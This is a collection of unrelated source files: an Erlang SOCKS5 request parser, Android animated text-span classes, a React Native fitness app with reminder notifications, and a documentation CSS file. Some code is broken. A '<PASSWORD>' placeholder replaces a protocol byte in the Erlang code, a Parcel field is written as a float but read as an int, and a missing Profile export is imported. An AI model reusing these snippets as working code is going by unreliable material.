-define(IPV6, 16#04).
-define(DOMAIN, 16#03).
%%%===================================================================
%%% API
%%%===================================================================
parse_greeting_request(<<16#05:8, NumMethods:8, Methods:NumMethods/binary>>) ->
{auth_methods, Methods}.
unparse_greeting_response(Method) ->
MethodProp = [{no_auth, 16#00},
{user_pass, <PASSWORD>}],
Code = proplists:get_value(Method, MethodProp),
<<16#05:8, Code:8>>.
parse_auth_request(user_pass, _) ->
{error, not_implemented_yet}.
parse_connection_request(<<16#05:8, CmdCode:8, 0:8, AddrType:8, Rest/binary>>) ->
case CmdCode of
%% CONNET
16#01 ->
case AddrType of
?IPV4 ->
<<Address:32, Port:16>> = Rest,
{connect, {ipv4, Address, Port}};
?IPV6 ->
<<Address:128, Port:16>> = Rest,
{connect, {ipv6, Address, Port}};
?DOMAIN ->
<<DomainLen:8, DomainBin:DomainLen/binary, Port:16>> = Rest,
%<<?DOMAIN, Port:16, DomainLen:8, DomainBin/binary>>
{connect, {domain, DomainBin, Port}}
end;
%% BIND
16#02 ->
{error, not_implemented_yet};
%% UDP ASSOCIATE
16#03 ->
{error, not_implemented_yet}
end.
unparse_connection_response({granted, {ipv4, IP, Port}}) ->
<<16#05:8, 16#00:8, 0:8, ?IPV4, IP/binary, Port:16>>;
unparse_connection_response({granted, {ipv6, IP, Port}}) ->
<<16#05:8, 16#00:8, 0:8, ?IPV6, IP/binary, Port:16>>;
unparse_connection_response({granted, {domain, DomainBin, Port}}) ->
<<16#05:8, 16#00:8, 0:8, ?DOMAIN, (byte_size(DomainBin)):8, DomainBin/binary, Port:16>>;
unparse_connection_response({rejected, _}) ->
<<16#05:8, 16#03:8, 0:8>>.
%%%===================================================================
%%% Internal functions
%%%===================================================================
| andelf/erlang-proxy |
<|start_filename|>app/src/main/java/com/flavienlaurent/spanimated/MutableForegroundColorSpan.java<|end_filename|>
package com.flavienlaurent.spanimated;
import android.graphics.Color;
import android.os.Parcel;
import android.text.TextPaint;
import android.text.style.ForegroundColorSpan;
public class MutableForegroundColorSpan extends ForegroundColorSpan {
private int mAlpha = 255;
private int mForegroundColor;
public MutableForegroundColorSpan(int alpha, int color) {
super(color);
mAlpha = alpha;
mForegroundColor = color;
}
public MutableForegroundColorSpan(Parcel src) {
super(src);
mForegroundColor = src.readInt();
mAlpha = src.readInt();
}
public void writeToParcel(Parcel dest, int flags) {
super.writeToParcel(dest, flags);
dest.writeInt(mForegroundColor);
dest.writeFloat(mAlpha);
}
@Override
public void updateDrawState(TextPaint ds) {
ds.setColor(getForegroundColor());
}
/**
* @param alpha from 0 to 255
*/
public void setAlpha(int alpha) {
mAlpha = alpha;
}
public void setForegroundColor(int foregroundColor) {
mForegroundColor = foregroundColor;
}
public float getAlpha() {
return mAlpha;
}
@Override
public int getForegroundColor() {
return Color.argb(mAlpha, Color.red(mForegroundColor), Color.green(mForegroundColor), Color.blue(mForegroundColor));
}
}
<|start_filename|>app/src/main/java/com/flavienlaurent/spanimated/StrikeSpan.java<|end_filename|>
package com.flavienlaurent.spanimated;
import android.graphics.Canvas;
import android.graphics.Color;
import android.graphics.Paint;
import android.graphics.RectF;
import android.text.style.ReplacementSpan;
/**
*/
public class StrikeSpan extends ReplacementSpan {
private final Paint mPaint;
private int mWidth;
public StrikeSpan(int strokeWidth) {
mPaint = new Paint();
mPaint.setStyle(Paint.Style.STROKE);
mPaint.setColor(Color.BLUE);
mPaint.setAntiAlias(true);
mPaint.setStrokeWidth(strokeWidth);
}
@Override
public int getSize(Paint paint, CharSequence text, int start, int end, Paint.FontMetricsInt fm) {
mWidth = (int) paint.measureText(text, start, end);
return mWidth;
}
@Override
public void draw(Canvas canvas, CharSequence text, int start, int end, float x, int top, int y, int bottom, Paint paint) {
float centerY = (top + bottom) * 0.5f;
canvas.drawText(text, start, end, x, y, paint);
canvas.drawLine(x, centerY, x + mWidth, centerY, mPaint);
}
}
<|start_filename|>app/src/main/java/com/flavienlaurent/spanimated/BubbleSpan.java<|end_filename|>
package com.flavienlaurent.spanimated;
import android.graphics.Canvas;
import android.graphics.Color;
import android.graphics.Paint;
import android.graphics.RectF;
import android.text.style.ReplacementSpan;
import java.util.Random;
public class BubbleSpan extends ReplacementSpan {
private static final String TAG = "BubbleSpan";
private static final boolean DEBUG = false;
private Paint mPaint;
static Random random = new Random();
private int mWidth = -1;
private RectF mRectF = new RectF();
private int[] mColors = new int[20];
public BubbleSpan() {
initPaint();
initColors();
}
private void initPaint() {
mPaint = new Paint();
mPaint.setColor(Color.rgb(random.nextInt(255), random.nextInt(255), random.nextInt(255)));
mPaint.setAntiAlias(true);
}
private void initColors() {
for(int index = 0 ; index < mColors.length ; index++) {
mColors[index] = Color.rgb(random.nextInt(255), random.nextInt(255), random.nextInt(255));
}
}
@Override
public int getSize(Paint paint, CharSequence text, int start, int end, Paint.FontMetricsInt fm) {
//return text with relative to the Paint
mWidth = (int) paint.measureText(text, start, end);
return mWidth;
}
@Override
public void draw(Canvas canvas, CharSequence text, int start, int end, float x, int top, int y, int bottom, Paint paint) {
float charx = x;
for(int i = start ; i<end; i++) {
String charAt = extractText(text, i, i + 1);
float charWidth = paint.measureText(charAt);
mRectF.set(charx, top, charx += charWidth, bottom);
mPaint.setColor(mColors[i % mColors.length]);
canvas.drawOval(mRectF, mPaint);
}
canvas.drawText(text, start, end, x, y, paint);
}
private String extractText(CharSequence text, int start, int end) {
return text.subSequence(start, end).toString();
}
}
<|start_filename|>app/src/main/java/com/flavienlaurent/spanimated/MutableBlurMaskFilterSpan.java<|end_filename|>
package com.flavienlaurent.spanimated;
import android.graphics.BlurMaskFilter;
import android.graphics.MaskFilter;
import android.text.TextPaint;
import android.text.style.CharacterStyle;
import android.text.style.UpdateAppearance;
public class MutableBlurMaskFilterSpan extends CharacterStyle implements UpdateAppearance {
private static final String TAG = "MutableBlurMaskFilterSpan";
private float mRadius;
private MaskFilter mFilter;
public MutableBlurMaskFilterSpan(float radius) {
mRadius = radius;
}
public void setRadius(float radius) {
mRadius = radius;
mFilter = new BlurMaskFilter(mRadius, BlurMaskFilter.Blur.NORMAL);
}
public float getRadius() {
return mRadius;
}
public MaskFilter getFilter() {
return mFilter;
}
@Override
public void updateDrawState(TextPaint ds) {
ds.setMaskFilter(mFilter);
}
} | flavienlaurent/spans |
<|start_filename|>index.ios.js<|end_filename|>
import React, { Component } from 'react';
import { AppRegistry } from 'react-native';
import { Provider } from 'react-redux';
import configureStore from './app/configureStore';
import Main from './app/containers/main';
const store = configureStore();
class Root extends Component {
render() {
return (
<Provider store={store}>
<Main />
</Provider>
);
}
}
AppRegistry.registerComponent('ProFit', () => Root);
<|start_filename|>app/components/list-item.js<|end_filename|>
import React, { Component } from 'react';
import I18n, { moment } from './../locales';
import Ionicons from 'react-native-vector-icons/Ionicons';
import { removeNotification } from './../actions';
import {
StyleSheet,
View,
Text,
TouchableOpacity
} from 'react-native';
import { connect } from 'react-redux';
class ListItem extends Component {
render() {
const {
dispatch,
editModeNotifications,
item
} = this.props;
return (
<View style={{flexDirection: 'row'}}>
{ editModeNotifications &&
<TouchableOpacity
onPress={() => dispatch(removeNotification(item))}
>
<View style={styles.removeIcon}>
<Ionicons name='ios-remove-circle' size={25} color={'#e92038'} />
</View>
</TouchableOpacity>
}
<View style={styles.listItem}>
<Text style={styles.listItemText}>
{moment(item.date).calendar()}
</Text>
</View>
</View>
);
}
}
const styles = StyleSheet.create({
listItemText: {
fontSize: 18,
},
listItem: {
flex: 1,
padding: 10,
backgroundColor: '#fff',
borderBottomWidth: .5,
borderBottomColor: '#aaa'
},
removeIcon: {
padding: 8
}
});
const mapStateToProps = (state) => {
const {
editModeNotifications
} = state
return {
editModeNotifications
}
}
export default connect(mapStateToProps)(ListItem);
<|start_filename|>app/components/index.js<|end_filename|>
import Workouts from './workouts';
import Food from './food';
import Notifications from './notifications';
import NewNotificationPopup from './new-notification-popup';
import NavButton from './nav-button';
import Layout from './layout';
import ListItem from './list-item';
import Sidebar from './sidebar';
import SidebarBody from './sidebar-body';
export {
Workouts,
Food,
Notifications,
NewNotificationPopup,
NavButton,
Layout,
ListItem,
Sidebar,
SidebarBody
}
<|start_filename|>app/components/notifications.js<|end_filename|>
import React, { Component } from 'react';
import I18n, { moment } from './../locales';
import Icon from 'react-native-vector-icons/MaterialIcons';
import {
openNewNotificationPopup,
getNotifications,
enableEditModeNotifications,
disableEditModeNotifications
} from './../actions';
import {
AsyncStorage,
StyleSheet,
ListView,
TouchableHighlight,
TouchableOpacity,
View,
Text
} from 'react-native';
import {
Layout,
NavButton,
ListItem,
NewNotificationPopup
} from './';
import { connect } from 'react-redux';
class Notifications extends Component {
componentDidMount() {
const { dispatch } = this.props;
dispatch(getNotifications());
}
render() {
const {
dispatch,
notifications,
editNotifications,
editModeNotifications,
newNotificationPopup
} = this.props;
let ds = new ListView.DataSource({rowHasChanged: (r1, r2) => r1 !== r2});
const notifications_items = ds.cloneWithRows(notifications.items);
return (
<Layout
menu={this.props.menu}
title={I18n.t('notifications')}
image={require('./../images/layout4.png')}
left={() =>
<View>
{ editNotifications &&
<View>
{ editModeNotifications ?
<NavButton
name={I18n.t('done')}
onPress={() => dispatch(disableEditModeNotifications())}
/>
:
<NavButton
name={I18n.t('edit')}
onPress={() => dispatch(enableEditModeNotifications())}
/>
}
</View>
}
</View>
}
right={() =>
<NavButton
right={true}
name={I18n.t('add')}
onPress={() => {
dispatch(disableEditModeNotifications());
dispatch(openNewNotificationPopup())
}}
/>
}>
<ListView
dataSource={notifications_items}
enableEmptySections={true}
renderRow={(item, _, index) =>
<ListItem item={item} key={index} />
}/>
{newNotificationPopup.open && <NewNotificationPopup />}
</Layout>
)
}
}
const styles = StyleSheet.create({
list: {
flex: 1
},
});
const mapStateToProps = (state) => {
const {
notifications,
newNotificationPopup,
editNotifications,
editModeNotifications
} = state
return {
notifications,
newNotificationPopup,
editNotifications,
editModeNotifications
}
}
export default connect(mapStateToProps)(Notifications);
<|start_filename|>app/components/food.js<|end_filename|>
import React, { Component } from 'react';
import I18n from './../locales';
import { connect } from 'react-redux';
import { loadNotifications } from './../actions';
import Ionicons from 'react-native-vector-icons/Ionicons';
import {
Notifications,
Layout
} from './';
import {
PushNotificationIOS,
ActivityIndicatorIOS,
StyleSheet,
TabBarIOS,
Text,
View,
ListView,
Modal,
TouchableHighlight
} from 'react-native';
class Food extends Component {
constructor(props) {
super(props);
this.state = {selected: 'programs'};
}
componentDidMount() {
PushNotificationIOS.requestPermissions();
}
render() {
return (
<TabBarIOS
unselectedTintColor='white'
tintColor='#000'
barTintColor='#fff'>
<Ionicons.TabBarItemIOS
title={I18n.t('programs')}
iconName='ios-locate-outline'
selectedIconName='ios-locate'
selected={this.state.selected === 'programs'}
onPress={() => {
this.setState({selected: 'programs'});
}}>
<Layout
menu={I18n.t('food')}
title={I18n.t('programs')}>
</Layout>
</Ionicons.TabBarItemIOS>
<Ionicons.TabBarItemIOS
title={I18n.t('journal')}
iconName='ios-calendar-outline'
selectedIconName='ios-calendar'
selected={this.state.selected === 'journal'}
onPress={() => {
this.setState({selected: 'journal'});
}}>
<Layout
menu={I18n.t('food')}
title={I18n.t('journal')}>
</Layout>
</Ionicons.TabBarItemIOS>
<Ionicons.TabBarItemIOS
title={I18n.t('products')}
iconName='ios-list-box-outline'
selectedIconName='ios-list-box'
selected={this.state.selected === 'list'}
onPress={() => {
this.setState({selected: 'list'});
}}>
<Layout
menu={I18n.t('food')}
title={I18n.t('products')}>
</Layout>
</Ionicons.TabBarItemIOS>
<Ionicons.TabBarItemIOS
title={I18n.t('water')}
iconName='ios-water-outline'
selectedIconName='ios-water'
selected={this.state.selected === 'water'}
onPress={() => {
this.setState({selected: 'water'});
}}>
<Layout
menu={I18n.t('food')}
title={I18n.t('water')}>
</Layout>
</Ionicons.TabBarItemIOS>
<Ionicons.TabBarItemIOS
title={I18n.t('notifications')}
iconName='ios-alarm-outline'
selectedIconName='ios-alarm'
selected={this.state.selected === 'notifications'}
onPress={() => {
this.setState({selected: 'notifications'});
}}>
<Notifications menu={I18n.t('food')} />
</Ionicons.TabBarItemIOS>
</TabBarIOS>
);
}
}
const mapStateToProps = (state) => {
return {}
}
export default connect(mapStateToProps)(Food)
<|start_filename|>app/components/new-notification-popup.js<|end_filename|>
import React, { Component } from 'react';
import I18n from './../locales';
import { connect } from 'react-redux';
import {
closeNewNotificationPopup,
addNotification
} from './../actions';
import {
Layout,
NavButton
} from './';
import {
DatePickerIOS,
Modal,
StyleSheet,
View,
Text,
TouchableOpacity
} from 'react-native';
class NewNotificationPopup extends Component {
constructor(props) {
super(props);
this.state = {date: new Date()};
console.ignoredYellowBox = [
'Warning: Failed propType',
];
}
onDateChange(date) {
this.setState({date});
}
render() {
const { dispatch, newNotificationPopup } = this.props;
return (
<Modal
transparent={true}
animated={true}>
<Layout
modal={true}
left={() =>
<NavButton
name={I18n.t('close')}
onPress={() => dispatch(closeNewNotificationPopup())}
/>
}
right={() =>
<NavButton
right={true}
name={I18n.t('done')}
onPress={() => {
dispatch(addNotification(this.state.date));
dispatch(closeNewNotificationPopup());
}}
/>
}
title={I18n.t('newNotification')}>
<View style={styles.modal}>
<DatePickerIOS
date={this.state.date}
mode='datetime'
onDateChange={this.onDateChange.bind(this)}
/>
<Text style={styles.remind}>{I18n.t('will_remind_hour_before')}</Text>
</View>
</Layout>
</Modal>
)
}
}
const styles = StyleSheet.create({
modal: {
flex: 1,
backgroundColor: '#fff'
},
close: {
fontSize: 14,
textAlign: 'left'
},
done: {
fontSize: 14,
textAlign: 'right'
},
remind: {
padding: 15,
textAlign: 'center'
}
});
const mapStateToProps = (state) => {
const { newNotificationPopup } = state
return { newNotificationPopup }
}
export default connect(mapStateToProps)(NewNotificationPopup);
<|start_filename|>app/components/layout.js<|end_filename|>
import React, { Component } from 'react';
import Ionicons from 'react-native-vector-icons/Ionicons';
import {
openSidebar
} from './../actions';
import {
StatusBar,
StyleSheet,
TouchableOpacity,
View,
Text,
Image,
TouchableHighlight
} from 'react-native';
import { connect } from 'react-redux';
class Layout extends Component {
render() {
const { dispatch, modal, sidebar } = this.props;
return (
<View style={styles.layout}>
<StatusBar barStyle={sidebar ? 'default' : 'light-content'} />
<Image source={this.props.image || require('./../images/layout.png')} style={styles.headerImage}>
<View>
{ modal ||
<View style={styles.headerTop}>
<TouchableOpacity
onPress={() => dispatch(openSidebar())}
>
<Ionicons style={styles.bars} name='ios-menu-outline' color='#fff' size={35} />
</TouchableOpacity>
{ this.props.menu &&
<Text style={styles.menuTitle}>{this.props.menu}</Text>
}
</View>
}
<View style={[styles.header, modal ? styles.headerModal : {}]}>
<View style={styles.left}>
{ this.props.left && this.props.left() }
</View>
<Text style={styles.title}>{this.props.title}</Text>
<View style={styles.right}>
{ this.props.right && this.props.right() }
</View>
</View>
</View>
</Image>
<View style={styles.layoutInner}>
{this.props.children}
</View>
</View>
)
}
}
const styles = StyleSheet.create({
layout: {
flex: 1,
backgroundColor: 'transparent'
},
layoutInner: {
flex: 1,
backgroundColor: '#f5f5f5'
},
bars: {
padding: 10,
marginTop: -10,
marginLeft: -5,
},
headerTop: {
marginTop: 10,
padding: 15,
flexDirection: 'row'
},
menuTitle: {
marginLeft: 10,
marginTop: 7,
fontSize: 18,
color: '#fff'
},
headerImage: {
width: null,
height: null,
resizeMode: 'cover',
},
header: {
padding: 5,
paddingTop: 80,
height: 120,
alignItems: 'center',
flexDirection: 'row',
justifyContent: 'space-between',
},
headerModal: {
paddingTop: 30,
height: 70
},
left: {
flex: 1
},
right: {
flex: 1
},
title: {
flex: 2,
color: '#fff',
fontSize: 18,
fontWeight: '500',
lineHeight: 18,
textAlign: 'center',
}
});
const mapStateToProps = (state) => {
const { sidebar } = state;
return { sidebar }
}
export default connect(mapStateToProps)(Layout);
<|start_filename|>app/components/sidebar.js<|end_filename|>
import {
StyleSheet,
Animated,
View,
Text,
TouchableWithoutFeedback
} from 'react-native';
import {
closeSidebar
} from './../actions';
import {
SidebarBody
} from './';
import { connect } from 'react-redux';
import React, { Component } from 'react';
const WIDTH = 250;
class Sidebar extends Component {
constructor(props) {
super(props);
const { dispatch } = props;
let left = new Animated.Value(-WIDTH);
left.addListener(({ value }) => {
if (value == -WIDTH) {
dispatch(closeSidebar());
}
});
this.state = {left};
}
componentDidMount() {
Animated.timing(
this.state.left,
{toValue: 0}
).start();
}
render() {
const { dispatch, sidebar } = this.props;
return (
<TouchableWithoutFeedback
onPressIn={() => {
Animated.timing(
this.state.left,
{toValue: -WIDTH}
).start();
}}
>
<View
style={styles.sidebar__overlay}
>
<TouchableWithoutFeedback>
<Animated.View
style={[styles.sidebar, {left: this.state.left}]}>
<SidebarBody navigator={this.props.navigator}/>
</Animated.View>
</TouchableWithoutFeedback>
</View>
</TouchableWithoutFeedback>
);
}
}
const mapStateToProps = (state) => {
const { sidebar } = state;
return { sidebar };
};
const styles = StyleSheet.create({
sidebar: {
position: 'absolute',
top: 0,
left: 0,
bottom: 0,
width: 250,
overflow: 'hidden',
backgroundColor: '#eee'
},
sidebar__overlay: {
position: 'absolute',
top: 0,
right: 0,
bottom: 0,
left: 0,
backgroundColor: 'rgba(0,0,0,.3)'
},
});
export default connect(mapStateToProps)(Sidebar);
<|start_filename|>app/locales.js<|end_filename|>
import I18n from 'react-native-i18n';
import moment from 'moment';
I18n.fallbacks = true;
I18n.translations = {
'en-US': {
workout: 'Workout',
workouts: 'Workouts',
notification: 'Notification',
notifications: 'Notifications',
programs: 'Programs',
journal: 'Journal',
notifications: 'Notifications',
newNotification: 'New',
exercises: 'Exercises',
products: 'Products',
water: 'Water',
food: 'Food',
newFood: 'New',
profile: 'Profile',
add: 'Add',
edit: 'Edit',
close: 'Close',
done: 'Done',
will_remind_hour_before: `We'll remind you about the workout for 1 hour before the start.`
},
'ru': {
workout: 'Тренировка',
workouts: 'Тренировки',
notification: 'Напоминание',
notifications: 'Напоминания',
programs: 'Программы',
journal: 'Дневник',
notifications: 'Напоминания',
newNotification: 'Новая',
exercises: 'Упражнения',
products: 'Продукты',
water: 'Вода',
food: 'Питание',
newFood: 'Новая',
profile: 'Профиль',
add: 'Добавить',
edit: 'Изменить',
close: 'Закрыть',
done: 'Готово',
will_remind_hour_before: 'Мы напомним вам о тренировке за один час до начала.'
}
}
if (!I18n.locale.match(/en/)) {
let ruLocale = require('moment/locale/ru');
moment.updateLocale('ru', ruLocale);
}
export default I18n;
export { I18n, moment };
<|start_filename|>app/components/sidebar-body.js<|end_filename|>
import React, { Component } from 'react';
import MaterialIcons from 'react-native-vector-icons/MaterialIcons';
import I18n from './../locales';
import { connect } from 'react-redux';
import { goTo } from './../actions';
import {
StyleSheet,
StatusBar,
TouchableHighlight,
Text,
View
} from 'react-native';
class SidebarBody extends Component {
render() {
const { dispatch } = this.props;
return (
<View style={{flex: 1, paddingTop: 50}}>
<TouchableHighlight underlayColor='#fff' onPress={() => dispatch(goTo('workouts'))}>
<View style={[styles.menuItem, styles.menuItemFirst]}>
<MaterialIcons name='fitness-center' color='#333' size={25} />
<Text style={styles.menuItemText}>{I18n.t('workouts')}</Text>
</View>
</TouchableHighlight>
<TouchableHighlight underlayColor='#fff' onPress={() => dispatch(goTo('food'))}>
<View style={styles.menuItem}>
<MaterialIcons name='restaurant' color='#333' size={25} />
<Text style={styles.menuItemText}>{I18n.t('food')}</Text>
</View>
</TouchableHighlight>
<TouchableHighlight underlayColor='#fff' onPress={() => dispatch(goTo('profile'))}>
<View style={styles.menuItem}>
<MaterialIcons name='face' color='#333' size={25} />
<Text style={styles.menuItemText}>{I18n.t('profile')}</Text>
</View>
</TouchableHighlight>
</View>
);
}
}
const styles = StyleSheet.create({
menuItem: {
padding: 15,
flexDirection: 'row',
borderBottomWidth: 1,
borderBottomColor: '#ccc'
},
menuItemFirst: {
borderTopWidth: 1,
borderTopColor: '#ccc'
},
menuItemText: {
marginTop: 4,
marginLeft: 15,
}
});
const mapStateToProps = (state) => {
return { }
}
export default connect(mapStateToProps)(SidebarBody);
<|start_filename|>app/components/workouts.js<|end_filename|>
import React, { Component } from 'react';
import I18n from './../locales';
import { connect } from 'react-redux';
import { loadNotifications } from './../actions';
import Ionicons from 'react-native-vector-icons/Ionicons';
import {
Notifications,
Layout
} from './';
import {
PushNotificationIOS,
ActivityIndicatorIOS,
StyleSheet,
TabBarIOS,
Text,
Image,
View,
ScrollView,
ListView,
Modal,
TouchableHighlight
} from 'react-native';
class Workouts extends Component {
constructor(props) {
super(props);
this.state = {selected: 'programs'};
}
componentDidMount() {
PushNotificationIOS.requestPermissions();
}
render() {
return (
<TabBarIOS
unselectedTintColor='white'
tintColor='#000'
barTintColor='#fff'>
<Ionicons.TabBarItemIOS
title={I18n.t('programs')}
iconName='ios-locate-outline'
selectedIconName='ios-locate'
selected={this.state.selected === 'programs'}
onPress={() => {
this.setState({selected: 'programs'});
}}>
<Layout
menu={I18n.t('workouts')}
title={I18n.t('programs')}>
<ScrollView style={{flex: 1, marginBottom: 49}} automaticallyAdjustContentInsets={false}>
<Image style={{width: null, height: 100}} resizeMode='cover' source={require('./../images/program.png')}>
<View>
<Text style={{position: 'absolute', bottom: 15, left: 15}}>Программа "Рельеф"</Text>
</View>
</Image>
<Image style={{width: null, height: 100}} resizeMode='cover' source={require('./../images/program.png')} />
<Image style={{width: null, height: 100}} resizeMode='cover' source={require('./../images/program.png')} />
<Image style={{width: null, height: 100}} resizeMode='cover' source={require('./../images/program.png')} />
</ScrollView>
</Layout>
</Ionicons.TabBarItemIOS>
<Ionicons.TabBarItemIOS
title={I18n.t('journal')}
iconName='ios-calendar-outline'
selectedIconName='ios-calendar'
selected={this.state.selected === 'journal'}
onPress={() => {
this.setState({selected: 'journal'});
}}>
<Layout
menu={I18n.t('workouts')}
image={require('./../images/layout2.png')}
title={I18n.t('journal')}>
</Layout>
</Ionicons.TabBarItemIOS>
<Ionicons.TabBarItemIOS
title={I18n.t('exercises')}
iconName='ios-list-box-outline'
selectedIconName='ios-list-box'
selected={this.state.selected === 'list'}
onPress={() => {
this.setState({selected: 'list'});
}}>
<Layout
menu={I18n.t('workouts')}
image={require('./../images/layout3.png')}
title={I18n.t('exercises')}>
</Layout>
</Ionicons.TabBarItemIOS>
<Ionicons.TabBarItemIOS
title={I18n.t('notifications')}
iconName='ios-alarm-outline'
selectedIconName='ios-alarm'
selected={this.state.selected === 'notifications'}
onPress={() => {
this.setState({selected: 'notifications'});
}}>
<Notifications menu={I18n.t('workouts')} />
</Ionicons.TabBarItemIOS>
</TabBarIOS>
);
}
}
const mapStateToProps = (state) => {
return {}
}
export default connect(mapStateToProps)(Workouts)
<|start_filename|>app/containers/main.js<|end_filename|>
import React, { Component } from 'react';
import {
Workouts,
Food,
Profile,
Sidebar
} from './../components';
import { connect } from 'react-redux';
import {
View
} from 'react-native';
class Main extends Component {
renderLocation(location) {
switch (location) {
case 'workouts':
return <Workouts />;
case 'food':
return <Food />;
case 'profile':
return <Profile />;
default:
return <Workouts />;
}
}
render() {
const { dispatch, sidebar, location } = this.props;
return (
<View style={{flex: 1}}>
{ this.renderLocation(location) }
{ sidebar &&
<Sidebar />
}
</View>
);
}
}
const mapStateToProps = (state) => {
const { sidebar, location } = state;
return { sidebar, location }
}
export default connect(mapStateToProps)(Main);
<|start_filename|>app/components/nav-button.js<|end_filename|>
import React, { Component } from 'react';
import {
StyleSheet,
Text,
TouchableOpacity
} from 'react-native';
export default class NavButton extends Component {
render() {
return (
<TouchableOpacity
onPress={this.props.onPress}>
<Text style={[styles.button, this.props.right ? styles.button_r : {}]}>{this.props.name}</Text>
</TouchableOpacity>
)
}
}
const styles = StyleSheet.create({
button: {
paddingTop: 10,
paddingBottom: 10,
paddingLeft: 5,
paddingRight: 5,
color: '#fff',
fontSize: 14,
textAlign: 'left'
},
button_r: {
textAlign: 'right'
}
});
<|start_filename|>app/reducers.js<|end_filename|>
import { combineReducers } from 'redux';
const notifications = (state = {
items: []
}, action) => {
switch (action.type) {
case 'GET_NOTIFICATIONS':
return {
items: action.notifications
}
default:
return state
}
};
const newNotificationPopup = (state = {
open: false
}, action) => {
switch (action.type) {
case 'OPEN_NEW_NOTIFICATION_POPUP':
return Object.assign({}, state, {
open: true
});
case 'CLOSE_NEW_NOTIFICATION_POPUP':
return Object.assign({}, state, {
open: false
});
default:
return state;
}
};
const editNotifications = (state = false, action) => {
switch (action.type) {
case 'ENABLE_EDIT_NOTIFICATIONS':
return true;
case 'DISABLE_EDIT_NOTIFICATIONS':
return false;
default:
return state;
}
};
const editModeNotifications = (state = false, action) => {
switch (action.type) {
case 'ENABLE_EDIT_MODE_NOTIFICATIONS':
return true;
case 'DISABLE_EDIT_MODE_NOTIFICATIONS':
return false;
default:
return state;
}
};
const sidebar = (state = false, action) => {
switch (action.type) {
case 'OPEN_SIDEBAR':
return true;
case 'CLOSE_SIDEBAR':
return false;
default:
return state;
}
};
const location = (state = 'workouts', action) => {
switch (action.type) {
case 'GOTO':
return action.location;
default:
return state;
}
};
const rootReducer = combineReducers({
notifications,
newNotificationPopup,
editModeNotifications,
editNotifications,
sidebar,
location
});
export default rootReducer;
<|start_filename|>app/actions.js<|end_filename|>
import I18n, { moment } from './locales';
import { generateUUID } from './utils';
import {
PushNotificationIOS,
AsyncStorage
} from 'react-native';
const openNewNotificationPopup = () => {
return (dispatch, getState) => {
dispatch({
type: 'OPEN_NEW_NOTIFICATION_POPUP'
});
};
};
const closeNewNotificationPopup = () => {
return (dispatch, getState) => {
dispatch({
type: 'CLOSE_NEW_NOTIFICATION_POPUP'
});
};
};
const addNotification = date => {
return (dispatch, getState) => {
let notification = {
uuid: generateUUID(),
date: date
};
AsyncStorage.getItem('notifications', (err, notifications) => {
if (notifications && JSON.parse(notifications).length > 0) {
notifications = [...JSON.parse(notifications), notification].sort((a, b) =>
new Date(a.date) - new Date(b.date)
)
} else {
notifications = [notification];
}
AsyncStorage.setItem('notifications', JSON.stringify(notifications), () => {
if (notifications.length > 0) {
dispatch(enableEditNotifications());
}
dispatch({
type: 'GET_NOTIFICATIONS',
notifications: notifications
});
let fireDate = moment(notification.date)
.subtract(1, 'hour')
.set('second', 0)
.toDate();
if (notification.date > new Date()) {
PushNotificationIOS.scheduleLocalNotification({
fireDate: fireDate.getTime(),
alertBody: `${I18n.t('notification')}: ${moment(notification.date).calendar()}`,
userInfo: { uuid: notification.uuid }
});
}
});
});
};
};
const getNotifications = () => {
return (dispatch, getState) => {
AsyncStorage.getItem('notifications', (err, notifications) => {
if (!err && notifications) {
dispatch({
type: 'GET_NOTIFICATIONS',
notifications: JSON.parse(notifications).sort((a, b) =>
new Date(a.date) - new Date(b.date)
)
});
if (getState().notifications.items.length > 0) {
dispatch(enableEditNotifications());
} else {
dispatch(disableEditNotifications());
}
}
});
};
};
const enableEditModeNotifications = () => {
return (dispatch, getState) => {
dispatch({
type: 'ENABLE_EDIT_MODE_NOTIFICATIONS'
});
};
};
const disableEditModeNotifications = () => {
return (dispatch, getState) => {
dispatch({
type: 'DISABLE_EDIT_MODE_NOTIFICATIONS'
});
};
};
const enableEditNotifications = () => {
return (dispatch, getState) => {
dispatch({
type: 'ENABLE_EDIT_NOTIFICATIONS'
});
};
};
const disableEditNotifications = () => {
return (dispatch, getState) => {
dispatch({
type: 'DISABLE_EDIT_NOTIFICATIONS'
});
};
};
const removeNotification = (notification) => {
return (dispatch, getState) => {
AsyncStorage.getItem('notifications', (err, notifications) => {
if (notifications && JSON.parse(notifications).length > 0) {
let filtered_notifications = JSON.parse(notifications).filter((i) => i.uuid != notification.uuid);
notifications = filtered_notifications.sort((a, b) =>
new Date(a.date) - new Date(b.date)
)
} else {
notifications = [];
}
AsyncStorage.setItem('notifications', JSON.stringify(notifications), () => {
PushNotificationIOS.cancelLocalNotifications({uuid: notification.uuid});
dispatch({
type: 'GET_NOTIFICATIONS',
notifications: notifications
});
if (notifications.length === 0) {
dispatch(disableEditModeNotifications());
dispatch(disableEditNotifications());
}
});
});
};
};
const openSidebar = () => {
return (dispatch, getState) => {
dispatch({
type: 'OPEN_SIDEBAR'
});
};
};
const closeSidebar = () => {
return (dispatch, getState) => {
dispatch({
type: 'CLOSE_SIDEBAR'
});
};
};
const goTo = (location) => {
return (dispatch, getState) => {
dispatch(closeSidebar());
dispatch({
type: 'GOTO',
location
});
};
};
export {
openNewNotificationPopup,
closeNewNotificationPopup,
addNotification,
getNotifications,
enableEditNotifications,
disableEditNotifications,
enableEditModeNotifications,
disableEditModeNotifications,
removeNotification,
openSidebar,
closeSidebar,
goTo
};
| ivanzotov/react-native-example |
<|start_filename|>doc/source/_static/baobab.css<|end_filename|>
.class .method, .class .staticmethod{
border-bottom:1px dotted black;
}
div.warning p.admonition-title {
background-color:#EDD26A;
color:#AD3535;
}
div.warning {
border-color:#776C0B;
}
.field-name {
white-space:nowrap;
}
.download-button {
-moz-border-radius: 4px 4px 4px 4px;
-moz-box-shadow: 0 1px 4px rgba(0, 0, 0, 0.3);
-webkit-border-radius: 4px 4px 4px 4px;
-webkit-box-shadow: 0 1px 4px rgba(0, 0, 0, 0.3);
border-radius: 4px 4px 4px 4px;
box-shadow: 0 1px 4px rgba(0, 0, 0, 0.3);
background: -moz-linear-gradient(center top , #50B7D1, #286DA3) repeat scroll 0 0 transparent;
border: 1px solid #51A0B3;
color: white;
display: inline-block;
font-size: 14px;
font-weight:bold;
padding: 8px 20px;
text-shadow: -1px -1px 0 rgba(0, 0, 0, 0.25);
outline: medium none;
}
.download-button:hover {
background: -moz-linear-gradient(-90deg, #66C7E5, #328FC9) repeat scroll 0 0 transparent;
text-decoration: none;
color:white;
}
#main_bar {
background-color: black;
color: #FFFFFF;
font-family: cursive;
font-size: 40px;
padding: 5px;
text-align: left;
}
